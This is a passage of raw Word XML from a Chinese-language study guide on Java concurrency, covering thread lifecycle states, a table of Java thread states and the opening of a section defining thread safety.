                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId129" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4369177" cy="2960649"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">　　第一是创建状态。在生成线程对象，并没有调用该对象的</w:t>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>方法，这是线程处于创建状态。</w:t>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">　　第二是就绪状态。当调用了线程对象的</w:t>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>方法之后，该线程就进入了就绪状态，但是此时线程调度程序还没有把该线程设置为当前线程，此时处于就绪状态。在线程运行之后，从等待或者睡眠中回来之后，也会处于就绪状态。</w:t>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">　　第三是运行状态。线程调度程序将处于就绪状态的线程设置为当前线程，此时线程就进入了运行状态，开始运行</w:t>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>函数当中的代码。</w:t>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">　　第四是阻塞状态。线程正在运行的时候，被暂停，通常是为了等待某个时间的发生</w:t>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>比如说某项资源就绪</w:t>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>之后再继续运行。</w:t>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>sleep,suspend</w:t>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>wait</w:t>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>等方法都可以导致线程阻塞。</w:t>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">　　第五是死亡状态。如果一个线程的</w:t>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>方法执行结束或者调用</w:t>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>stop</w:t>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>方法后，该线程就会死亡。对于已经死亡的线程，无法再使用</w:t>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r w:rsidR="00B00198" w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>方法令其进入就绪。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ab"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="360" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1875"/>
        <w:gridCol w:w="6287"/>
      </w:tblGrid>
      <w:tr w:rsidR="002F4D60" w:rsidTr="002F4D60">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1875" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002F4D60" w:rsidRDefault="002F4D60" w:rsidP="00514328">
            <w:pPr>
              <w:pStyle w:val="a3"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>状态名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6287" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002F4D60" w:rsidRDefault="002F4D60" w:rsidP="00514328">
            <w:pPr>
              <w:pStyle w:val="a3"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F4D60" w:rsidTr="002F4D60">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1875" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002F4D60" w:rsidRDefault="002F4D60" w:rsidP="00514328">
            <w:pPr>
              <w:pStyle w:val="a3"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>NEW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6287" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002F4D60" w:rsidRDefault="002F4D60" w:rsidP="00514328">
            <w:pPr>
              <w:pStyle w:val="a3"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>初始状态，线程被构建，但是还没有调用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>start()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F4D60" w:rsidTr="002F4D60">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1875" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002F4D60" w:rsidRDefault="002F4D60" w:rsidP="00514328">
            <w:pPr>
              <w:pStyle w:val="a3"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>RUNNABLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6287" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002F4D60" w:rsidRDefault="002F4D60" w:rsidP="00514328">
            <w:pPr>
              <w:pStyle w:val="a3"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>运行状态，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Java</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>线程将操作系统中的</w:t>
            </w:r>
            <w:r w:rsidRPr="00CC27A5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>就绪和运行</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>两种状态笼统称为“运行中”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F4D60" w:rsidTr="002F4D60">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1875" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002F4D60" w:rsidRPr="002F4D60" w:rsidRDefault="002F4D60" w:rsidP="00514328">
            <w:pPr>
              <w:pStyle w:val="a3"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F4D60">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>BLOCKED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6287" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002F4D60" w:rsidRDefault="002F4D60" w:rsidP="00514328">
            <w:pPr>
              <w:pStyle w:val="a3"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>阻塞状态，表示</w:t>
            </w:r>
            <w:r w:rsidRPr="002F4D60">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>线程阻塞于锁</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F4D60" w:rsidTr="002F4D60">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1875" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002F4D60" w:rsidRPr="002F4D60" w:rsidRDefault="002F4D60" w:rsidP="00514328">
            <w:pPr>
              <w:pStyle w:val="a3"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F4D60">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>WAITING</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6287" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002F4D60" w:rsidRDefault="002F4D60" w:rsidP="00514328">
            <w:pPr>
              <w:pStyle w:val="a3"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>等待状态，表示线程进入等待状态，进入该状态表示当前线程需要等待其他线程做出一些特定动作</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>通知或中断</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F4D60" w:rsidTr="002F4D60">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1875" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002F4D60" w:rsidRDefault="002F4D60" w:rsidP="00514328">
            <w:pPr>
              <w:pStyle w:val="a3"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>TIME_WAITING</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6287" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002F4D60" w:rsidRDefault="002F4D60" w:rsidP="00514328">
            <w:pPr>
              <w:pStyle w:val="a3"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>超时等待状态，该状态不同于</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WAITING</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，它是可以再指定时间内自行返回</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F4D60" w:rsidTr="00347E4F">
        <w:trPr>
          <w:trHeight w:val="237"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1875" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002F4D60" w:rsidRDefault="002F4D60" w:rsidP="00514328">
            <w:pPr>
              <w:pStyle w:val="a3"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>TERMINATED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6287" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002F4D60" w:rsidRDefault="002F4D60" w:rsidP="00514328">
            <w:pPr>
              <w:pStyle w:val="a3"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>终止状态，表示当前线程已经执行完毕。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002F4D60" w:rsidRPr="00514328" w:rsidRDefault="002F4D60" w:rsidP="00514328">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AA20F8" w:rsidRPr="00F41A4C" w:rsidRDefault="00AA20F8" w:rsidP="001610CB">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>1.3.1</w:t>
      </w:r>
      <w:r w:rsidR="001610CB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>线程安全与线程不安全定义</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA20F8" w:rsidRPr="00F41A4C" w:rsidRDefault="00AA20F8" w:rsidP="005A0F26">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>有多个线程在同时运行，而这些线程可能会同时运行这段代码。如果每次运行结果和</w:t>
      </w:r>
      <w:hyperlink r:id="rId130" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>单线程</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>运行的结果是一样的，而且其他的变量的值也和预期的是一样的，就是线程安全的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA20F8" w:rsidRPr="00F41A4C" w:rsidRDefault="00AA20F8" w:rsidP="00AA20F8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>线程安全问题都是由</w:t>
      </w:r>
      <w:hyperlink r:id="rId131" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>全局变量</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>及</w:t>
      </w:r>
      <w:hyperlink r:id="rId132" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>静态变量</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>引起的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA20F8" w:rsidRPr="00F51F4C" w:rsidRDefault="00AA20F8" w:rsidP="00F51F4C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>若每个线程中对全局变量、静态变量只有读操作，而无写操作，一般来说，这个全局变量是线程安全的；若有多个线程同时执行写操作，一般都需要考虑</w:t>
      </w:r>
      <w:hyperlink r:id="rId133" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>线程同步</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
